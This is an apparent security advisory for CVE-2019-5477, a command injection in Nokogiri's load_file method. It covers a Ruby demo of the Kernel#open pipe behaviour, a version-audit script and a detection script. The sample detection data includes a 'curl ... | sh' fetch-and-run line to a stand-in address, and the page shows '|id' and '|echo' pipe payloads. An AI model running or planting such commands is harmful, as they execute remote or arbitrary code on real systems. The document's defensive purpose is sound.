CVE-2019-5477
📋 TL;DR
CVE-2019-5477 is a command injection vulnerability in Nokogiri v1.10.3 and earlier. The undocumented `Nokogiri::CSS::Tokenizer#load_file` method reads the named file with `Kernel#open`, which treats a filename beginning with `|` as a shell command to execute, so an application that passes untrusted input to `load_file` gives the attacker remote code execution as the application user. Ordinary CSS selector parsing (`doc.css(...)`) does not call `load_file`; only Ruby applications that feed user-controlled filenames to this method are exposed. The vulnerable method is generated by the Rexical gem (v1.0.6 and earlier), which Nokogiri uses to build its CSS tokenizer; Rexical v1.0.7 changes the generated code to use `File.open`.
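The following is an added example, not code from Nokogiri or Rexical. It recreates the assumed shape of the Rexical-generated `load_file` method (read the named file with `Kernel#open`) beside the hardened form that uses `File.open`, so the difference in behaviour on a `|`-prefixed "filename" can be observed directly. The class names and the `outcome` helper are illustrative; the `|echo injected` input is a constructed, harmless payload.

```ruby
require "tempfile"

# Added example recreating the assumed shape of the vulnerable method;
# this is not Nokogiri's or Rexical's actual source.
class VulnerableTokenizer
  # Kernel#open treats a path beginning with "|" as a shell command, runs it,
  # and hands back its stdout. That is what CVE-2019-5477 exploits.
  def load_file(filename)
    @filename = filename
    open(filename, "r") { |f| f.read }
  end
end

# Hardened form (the shape of the Rexical v1.0.7 fix): File.open only ever
# opens a file, so "|echo injected" is just a filename that does not exist.
class FixedTokenizer
  def load_file(filename)
    @filename = filename
    File.open(filename, "r") { |f| f.read }
  end
end

# Runs one input through a tokenizer and reports what happened as a string,
# so both variants can be compared on the same input.
def outcome(tokenizer, input)
  "read: #{tokenizer.load_file(input).strip.inspect}"
rescue Errno::ENOENT, Errno::EACCES => e
  "error: #{e.class}"
end

if $PROGRAM_NAME == __FILE__
  Tempfile.create("css") do |f|
    f.write("a > b")
    f.flush
    # Both variants read an ordinary file identically...
    puts outcome(VulnerableTokenizer.new, f.path)   # read: "a > b"
    puts outcome(FixedTokenizer.new, f.path)        # read: "a > b"
  end
  # ...but only the vulnerable one executes a pipe-prefixed "filename".
  puts outcome(VulnerableTokenizer.new, "|echo injected") # read: "injected"
  puts outcome(FixedTokenizer.new, "|echo injected")      # error: Errno::ENOENT
end
```

The fix is not input filtering but the choice of API: `File.open` has no pipe mode, so the same input that spawned a process under `Kernel#open` becomes a plain "no such file" error.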
💻 Affected Systems
- Nokogiri
- Rexical
📦 What is this software?
Nokogiri (sparklemotion/nokogiri)
Rexical (tenderlove/rexical)
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary command execution as the application user, giving the attacker a shell on the host; full system compromise if the application runs as root or the host is otherwise unhardened.
Likely Case
Most applications never call `load_file` and are not exposed. Where an application does pass user input to it, the likely outcome is remote code execution leading to data theft, credential theft, or lateral movement within the environment.
If Mitigated
Limited impact if user input never reaches `load_file`, and if least privilege and sandboxing contain what an injected command can do.
🎯 Exploit Status
Exploitation requires the application to pass attacker-controlled strings to `Nokogiri::CSS::Tokenizer#load_file`; ordinary CSS selector parsing does not call it. Where that code pattern exists, exploitation is trivial: a value beginning with `|` is run as a shell command by `Kernel#open`.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Nokogiri v1.10.4+, Rexical v1.0.7+
Vendor Advisory: https://github.com/sparklemotion/nokogiri/issues/1915
Restart Required: Yes
Instructions:
1. Update the Nokogiri gem: `gem update nokogiri`, or for a Bundler-managed application `bundle update nokogiri` so that `Gemfile.lock` is updated too.
2. Verify the version: `gem list nokogiri` (or `bundle list | grep nokogiri`) shows v1.10.4 or higher.
3. Restart application services so the new gem is loaded.
Nokogiri ships the Rexical-generated tokenizer inside the gem, so updating Nokogiri is what removes the bug from an application; update Rexical itself (v1.0.7+) where you generate your own lexers with it.
🔧 Temporary Workarounds
Input Validation
Do not pass user input to file-loading functions at all. If a filename must be derived from input, resolve it with `File.expand_path` under an allowlisted directory and open it with `File.open`, which has no pipe mode; at minimum reject any value that begins with `|`.
Avoid load_file Method
Do not use the undocumented `Nokogiri::CSS::Tokenizer#load_file` method with user-controlled input; audit the code base for any call to it.
🧯 If You Can't Patch
- Implement strict input validation and sanitization for all CSS parsing inputs
- Run application with minimal privileges and in isolated containers to limit impact
🔍 How to Verify
Check if Vulnerable:
Check the Nokogiri version: `gem list | grep nokogiri` - versions <=1.10.3 are vulnerable. Under Bundler, check the version the application actually loads: `bundle exec ruby -e 'require "nokogiri"; puts Nokogiri::VERSION'`.
Check Version:
gem list | grep nokogiri
Verify Fix Applied:
Confirm the Nokogiri version is >=1.10.4: `gem list | grep nokogiri`, or the `Nokogiri::VERSION` check above. Compare versions numerically rather than as strings (1.10.10 is newer than 1.10.4).
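An added example (not Nokogiri's own tooling) that performs the version check in Ruby: it compares versions with `Gem::Version` so that 1.10.10 is correctly treated as fixed, audits the `nokogiri` and `rexical` pins in a `Gemfile.lock`, and, when Nokogiri is installed, inspects the loaded tokenizer's source for a bare `open(` call. The `Gemfile.lock` excerpt is constructed sample input; the function names are illustrative.

```ruby
require "rubygems"

FIXED_NOKOGIRI = Gem::Version.new("1.10.4")
FIXED_REXICAL  = Gem::Version.new("1.0.7")

# Compare with Gem::Version, not String: "1.10.10" < "1.10.4" as text,
# but it is a later, fixed release.
def vulnerable_version?(version, fixed = FIXED_NOKOGIRI)
  Gem::Version.new(version) < fixed
end

# Pull pinned versions out of a Gemfile.lock specs section. Pinned gems sit at
# exactly four spaces of indent ("    nokogiri (1.10.3)"); their dependency
# lines are indented further and are skipped.
def locked_versions(lockfile_text)
  lockfile_text.scan(/^\s{4}(\S+) \(([^)\s]+)\)/).to_h
end

# Returns {"nokogiri" => true/false, "rexical" => true/false} for the gems
# present in the lockfile, true meaning the pinned version is vulnerable.
def audit_lockfile(lockfile_text)
  versions = locked_versions(lockfile_text)
  findings = {}
  [["nokogiri", FIXED_NOKOGIRI], ["rexical", FIXED_REXICAL]].each do |name, fixed|
    next unless versions.key?(name)
    findings[name] = vulnerable_version?(versions[name], fixed)
  end
  findings
end

# Runtime check against the installed gem: does the generated tokenizer still
# read files with a bare Kernel#open? Returns nil when it cannot be determined
# (Nokogiri not installed, or no load_file method to inspect).
def tokenizer_uses_kernel_open?
  require "nokogiri"
  file, = Nokogiri::CSS::Tokenizer.instance_method(:load_file).source_location
  File.read(file).match?(/^\s*open\(/)
rescue LoadError, NameError
  nil
end

# Constructed sample lockfile (not from a real project).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      mini_portile2 (2.4.0)
      nokogiri (1.10.3)
        mini_portile2 (~> 2.4.0)
      rexical (1.0.6)
LOCK

if $PROGRAM_NAME == __FILE__
  p audit_lockfile(SAMPLE_LOCK)               # {"nokogiri"=>true, "rexical"=>true}
  p audit_lockfile(File.read("Gemfile.lock")) if File.exist?("Gemfile.lock")
  p tokenizer_uses_kernel_open?
end
```

Run it from the application root to audit the real `Gemfile.lock`; the runtime check is the stronger signal, since it tests the tokenizer code that is actually loaded rather than a declared version.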
📡 Detection & Monitoring
Log Indicators:
- Unexpected child processes of the Ruby interpreter (for example `sh`, `id`, `whoami`, `curl`). Note that Ruby executes a command with no shell metacharacters directly, without an intermediate `sh`, so do not alert only on shells.
- Request parameters or exception messages in application logs containing values that begin with `|`, which is the pipe-open payload shape.
Network Indicators:
- Outbound connections from application to unexpected destinations
SIEM Query:
process.parent.name:(ruby OR puma OR unicorn) AND NOT process.name:(ruby OR puma OR unicorn OR git)
Tune the parent names to how the application's interpreter appears on your hosts and extend the exclusion list with helpers the application legitimately spawns.
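An added example (not part of the original page or any vendor tooling) that runs the two detections above over constructed sample data: ECS-like process-creation events as JSON lines, and a Rails-style request log line. The parent-name and allowlist values are assumptions to tune per environment; the events, hostnames and addresses are made up.

```ruby
require "json"

# Assumption: process names under which the application's Ruby interpreter
# shows up in telemetry, and helpers it is known to spawn legitimately.
RUBY_PARENTS      = %w[ruby puma unicorn].freeze
EXPECTED_CHILDREN = %w[git].freeze

# Constructed sample process-creation events (ECS-like shape, not real telemetry).
SAMPLE_EVENTS = [
  { "process" => { "name" => "ruby", "parent" => { "name" => "systemd" },
                   "command_line" => "ruby bin/rails server" } },
  { "process" => { "name" => "id",   "parent" => { "name" => "ruby" },
                   "command_line" => "id" } },
  { "process" => { "name" => "sh",   "parent" => { "name" => "ruby" },
                   "command_line" => "sh -c curl http://198.51.100.7/x | sh" } },
  { "process" => { "name" => "git",  "parent" => { "name" => "ruby" },
                   "command_line" => "git rev-parse HEAD" } },
  { "process" => { "name" => "sh",   "parent" => { "name" => "bash" },
                   "command_line" => "sh -c ls" } },
].map(&:to_json)

# A child of the Ruby interpreter that is not on the allowlist. Ruby execs a
# command without shell metacharacters directly (no intermediate sh), which is
# why the rule looks at every child, not just shells.
def suspicious?(event)
  process = event["process"]
  return false unless RUBY_PARENTS.include?(process.dig("parent", "name"))
  !EXPECTED_CHILDREN.include?(process["name"])
end

# Returns the command lines of the events the rule flags.
def flag_events(json_lines)
  json_lines.map { |line| JSON.parse(line) }
            .select { |event| suspicious?(event) }
            .map { |event| event["process"]["command_line"] }
end

# Rails request logs print params as {"key"=>"value"}. A value that starts
# with "|" is a pipe-open payload if it ever reaches load_file.
# Returns [[param_name, value], ...] for each such parameter.
def pipe_prefixed_params(log_line)
  log_line.scan(/"([^"]+)"=>"\|([^"]*)"/).map { |key, rest| [key, "|#{rest}"] }
end

# Constructed sample application log line.
SAMPLE_LOG = 'Parameters: {"stylesheet"=>"|id", "format"=>"css"}'

if $PROGRAM_NAME == __FILE__
  p flag_events(SAMPLE_EVENTS)        # ["id", "sh -c curl http://198.51.100.7/x | sh"]
  p pipe_prefixed_params(SAMPLE_LOG)  # [["stylesheet", "|id"]]
end
```

The process rule is the one to rely on: it fires on what the exploit actually does, while the log check only sees payloads that happen to be logged as request parameters.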
🔗 References
- https://github.com/sparklemotion/nokogiri/issues/1915
- https://github.com/tenderlove/rexical/blob/master/CHANGELOG.rdoc
- https://hackerone.com/reports/650835
- https://lists.debian.org/debian-lts-announce/2019/09/msg00027.html
- https://lists.debian.org/debian-lts-announce/2022/10/msg00018.html
- https://lists.debian.org/debian-lts-announce/2022/10/msg00019.html
- https://security.gentoo.org/glsa/202006-05
- https://usn.ubuntu.com/4175-1/